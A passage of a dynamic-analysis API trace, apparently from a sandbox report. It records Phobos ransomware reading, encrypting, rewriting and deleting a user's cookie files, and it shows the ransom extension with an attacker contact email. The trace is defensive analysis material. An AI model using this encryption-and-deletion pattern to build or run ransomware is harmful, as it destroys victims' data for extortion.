phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0194.018] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.018] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.018] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.018] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.018] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.018] CloseHandle (hObject=0x178) returned 1 [0194.018] CloseHandle (hObject=0x194) returned 1 [0194.018] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt")) returned 1 [0194.019] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.020] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=551) returned 1 [0194.020] CloseHandle (hObject=0x194) returned 1 [0194.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt")) returned 0x2020 [0194.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.020] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.021] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.021] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.021] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.021] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x227, lpOverlapped=0x0) returned 1 [0194.022] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x230, dwBufLen=0x230 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x230) returned 1 [0194.022] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x230, lpOverlapped=0x0) returned 1 [0194.023] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0194.023] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.023] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.023] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.023] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.023] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.024] CloseHandle (hObject=0x194) returned 1 [0194.024] CloseHandle (hObject=0x178) returned 1 [0194.024] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt")) returned 1 [0194.025] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.027] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=241) returned 1 [0194.027] CloseHandle (hObject=0x178) returned 1 [0194.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt")) returned 0x2020 [0194.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.027] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.027] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.028] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.028] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf1, lpOverlapped=0x0) returned 1 [0194.029] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0194.029] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0194.030] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0194.030] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.030] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.030] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.030] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.031] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.031] CloseHandle (hObject=0x178) returned 1 [0194.031] CloseHandle (hObject=0x194) returned 1 [0194.031] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt")) returned 1 [0194.032] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.032] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=111) returned 1 [0194.032] CloseHandle (hObject=0x194) returned 1 [0194.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt")) returned 0x2020 [0194.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.033] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.033] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.034] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.034] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.034] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x6f, lpOverlapped=0x0) returned 1 [0194.035] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.035] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x70, lpOverlapped=0x0) returned 1 [0194.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0194.036] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.036] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.036] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.036] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.036] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.036] CloseHandle (hObject=0x194) returned 1 [0194.036] CloseHandle (hObject=0x178) returned 1 [0194.036] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt")) returned 1 [0194.037] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.038] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=110) returned 1 [0194.038] CloseHandle (hObject=0x178) returned 1 [0194.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt")) returned 0x2020 [0194.038] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.038] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.038] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.039] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.039] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x6e, lpOverlapped=0x0) returned 1 [0194.040] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.040] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x70, lpOverlapped=0x0) returned 1 [0194.041] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0194.041] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.041] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.041] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.041] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.041] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.042] CloseHandle (hObject=0x178) returned 1 [0194.042] CloseHandle (hObject=0x194) returned 1 [0194.042] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt")) returned 1 [0194.043] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.044] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=276) returned 1 [0194.044] CloseHandle (hObject=0x194) returned 1 [0194.044] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt")) returned 0x2020 [0194.044] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.045] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.045] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 